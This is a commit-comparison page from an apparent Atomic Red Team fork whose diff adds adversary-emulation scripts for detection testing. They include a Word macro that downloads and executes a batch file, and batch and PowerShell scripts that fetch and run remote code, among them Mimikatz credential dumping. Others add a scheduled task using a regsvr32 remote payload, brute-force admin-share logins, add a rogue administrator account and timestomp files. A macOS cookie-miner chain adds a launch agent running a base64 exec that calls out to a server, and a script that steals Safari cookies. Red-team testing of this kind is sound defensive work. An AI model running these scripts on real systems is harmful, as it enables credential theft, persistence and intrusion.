security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:T1218.005-powershell-without-network-call
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:io-update
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

1 Commits
T1218.005-powershell-without-network-call .. io-update

Author SHA1 Message Date
Michael Haag cc15adc96c Spreadsheet URL - 404 
Received a 404 on the direct link to spreadsheet. I changed it to the spreadsheet directory, in case it changes or new things are added over time.
 2019-02-08 09:01:42 -07:00
895 changed files with 123653 additions and 420646 deletions
Expand all files Collapse all files
.circleci/config.yml
+10 -43
View File
@@ -6,19 +6,12 @@ defaults: &defaults
workflows:
version: 2
validate:
validate-then-generate-docs:
jobs:
- validate_atomics
generate-guids-and-docs:
jobs:
- generate_and_commit_guids_and_docs:
filters:
branches:
only: master
- validate_atomics_generate_docs
jobs:
validate_atomics:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
@@ -29,38 +22,8 @@ jobs:
command: |
bin/validate-atomics.rb
generate_and_commit_guids_and_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Generate and commit unique GUIDs for each atomic test
command: |
bin/generate-guids.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing GUID changes because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team GUID generator"
git add atomics
git commit -am "Generate GUIDs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]"
git push -u origin $CIRCLE_BRANCH
fi
- run:
name: Generate and commit nice markdown documents for atomics
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
@@ -73,12 +36,16 @@ jobs:
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH [skip ci]"
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
fi
.github/ISSUE_TEMPLATE/idea.md
-29
View File
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/new_atomic.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
.github/ISSUE_TEMPLATE/website_change.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/problem_report.md → .github/issue_template.md
+2 -8
View File
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
.gitignore
-21
View File
@@ -2,28 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
ARTifacts/Chain_Reactions/atomic-hello
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/atomic-hello.macos
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh
+49
View File
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
